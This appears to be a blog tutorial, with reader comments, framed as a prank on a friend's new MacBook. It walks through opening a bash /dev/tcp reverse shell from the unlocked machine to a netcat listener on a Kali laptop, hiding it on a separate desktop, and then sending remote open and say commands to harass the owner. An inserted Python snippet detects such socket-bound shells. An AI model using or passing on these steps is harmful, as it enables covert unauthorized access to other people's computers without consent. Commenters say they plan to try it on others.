Real Scenarios #1: The New MacBook

The New MacBook

You're at your friend's house. All you've heard about all day is his new laptop. He's got a brand new top-specced MacBook Pro, and he won't stop going on about it. It particularly annoys you as all you've got is a 4-year-old cheap laptop, even if it is running Linux.

If only there was some way to make him stop gloating!

Your goal is to be able to remotely control his computer, then whilst he's on it get it to do something that will shut him up.

How?

Unfortunately, OS X is a pretty secure OS, so there's not much in the way of quick exploits you can run.

Whilst you're pondering this conundrum, your friend leaves the room to get a drink, and he's left his new laptop unlocked! This is your chance!

Step 1: What Do I Do??!

You probably have 120 seconds before he gets back. What can you do in that time to get remote control of his computer?

Step 2: Find Your IP

You flip up the screen of your laptop, launch a terminal in Kali and type ifconfig.

You note your IP, 192.168.1.88, then turn to his computer.

Step 3: Set Up a Listener

What you want is a shell on his computer, through a TCP connection to yours, and you need to set it up in the least time possible!

On your own laptop, type the following to listen for a connection on port 1234 (you can use whichever port you like as long as it's not being used by something else):

nc -l -p 1234

Step 4: Connection

First, you create a new desktop on his Mac as you don't want him to see what you've done.

Then, you open a terminal and type the following:

bash -i >& /dev/tcp/192.168.1.88/1234 0>&1

This opens a TCP connection to 192.168.1.88 (your IP) on port 1234 and attaches an interactive bash's input, output and error streams to it, in effect creating a reverse shell.

You also turn his volume up, for something you have planned later....

You put down his laptop just as he re-enters the room.
Now you have a shell on his system!
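
Seen from the Mac owner's side, the redirection is set up before bash starts, so the process list shows only `bash -i`; what gives the shell away is that its stdin, stdout and stderr all sit on the same TCP connection. The Python below is an added example, not part of the original article, that checks for exactly that over constructed `lsof -nP -iTCP` output. The sample rows, the user alice, the PIDs and the local address 192.168.1.50 are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in the column layout printed by `lsof -nP -iTCP`.
# PIDs, the user and the local address 192.168.1.50 are made up; the remote
# endpoint of PID 4021 is the listener address and port used in this article.
SAMPLE_LSOF = """\
COMMAND  PID  USER   FD  TYPE DEVICE SIZE/OFF NODE NAME
Safari  3990 alice  23u  IPv4 0x51c0      0t0  TCP 192.168.1.50:51490->203.0.113.10:443 (ESTABLISHED)
bash    4021 alice   0u  IPv4 0x1a2b      0t0  TCP 192.168.1.50:51514->192.168.1.88:1234 (ESTABLISHED)
bash    4021 alice   1u  IPv4 0x1a2b      0t0  TCP 192.168.1.50:51514->192.168.1.88:1234 (ESTABLISHED)
bash    4021 alice   2u  IPv4 0x1a2b      0t0  TCP 192.168.1.50:51514->192.168.1.88:1234 (ESTABLISHED)
bash    4300 alice   1u  IPv4 0x77aa      0t0  TCP 192.168.1.50:51600->203.0.113.10:80 (ESTABLISHED)
"""

SHELLS = {"sh", "bash", "zsh", "dash", "ksh"}
# COMMAND PID USER FD(+mode) TYPE DEVICE SIZE/OFF NODE local->remote
ROW = re.compile(
    r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)[rwu]\s+IPv[46]\s+\S+\s+\S+\s+TCP\s+(\S+)->(\S+)"
)

def find_socket_shells(lsof_text):
    """Return shells whose stdin, stdout and stderr all sit on one TCP connection."""
    fds = defaultdict(dict)  # (pid, command, user) -> {fd number: remote endpoint}
    for line in lsof_text.splitlines():
        m = ROW.match(line)
        if m and m.group(1) in SHELLS:
            cmd, pid, user, fd, _local, remote = m.groups()
            fds[(int(pid), cmd, user)][int(fd)] = remote
    hits = []
    for (pid, cmd, user), table in sorted(fds.items()):
        remotes = {table.get(n) for n in (0, 1, 2)}
        # A terminal-attached shell has a tty on 0-2; one redirected fd is not enough.
        if None not in remotes and len(remotes) == 1:
            hits.append({"pid": pid, "command": cmd, "user": user,
                         "remote": remotes.pop()})
    return hits

if __name__ == "__main__":
    for hit in find_socket_shells(SAMPLE_LSOF):
        print("shell with stdio on a TCP socket:", hit)
```

PID 4300 is not reported because only its stdout is redirected to a socket, and Safari is ignored because it is not a shell.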

Step 5: Imagination

You've achieved your goal! You now have remote access to his computer!

What now?

Well, first let's just annoy and puzzle him by repeatedly opening Safari.

We type

open -a safari

which gets sent through our TCP connection and opens Safari on his screen.

We do this a few times and can visibly see him getting annoyed. Oh the joy :)

Step 6: Crank Up the Prank

Now let's have some fun by getting his computer to say things. On OS X there's a say command, which speaks text out loud, so let your imagination run wild as to what you get it to say.

In this case, let's just make him believe he's got an error by typing the following:

say "Segmentation fault. Please return to vendor"

Oh, the look on his face.

You've had your fun, so you wind it up by saying the following in a Zarvox voice (because why the heck not):

say -v "Zarvox" "You are an idiot. Your friend, however, is awesome."

Step 7: Run.

Hope you enjoyed :)

8 Comments

Love the idea of these tuts. I'll be driving the Mrs a little crazy with this one lol

Nice one! But... shouldn't steps 3 and 4 be inverted? I mean... you first open a listener on your PC (nc -l -p 1234), then connect from the MacBook. Not sure how Macs handle connections, but any Win/Linux will try to connect just once, then fail if the port is closed, and quit. Does your command issue a persistent connection attempt (if fail, then retry)?

Yeah, I was wondering too, because your Kali is supposed to be listening for the connection, then you can execute the shell on the Mac.

You're completely right; I've switched them round. I've been playing with bind and reverse shells so absent-mindedly confused the order!

Easy and clear, effective and demonstrative. Good way to start a series.

Nice tutorial, I'm thinking of trying it.

Nice one :D So, how can we do this to a Linux or Windows PC?
MacOS: bash -i >& /dev/tcp/192.168.1.88/1234 0>&1
Windows: ???
Linux: ???
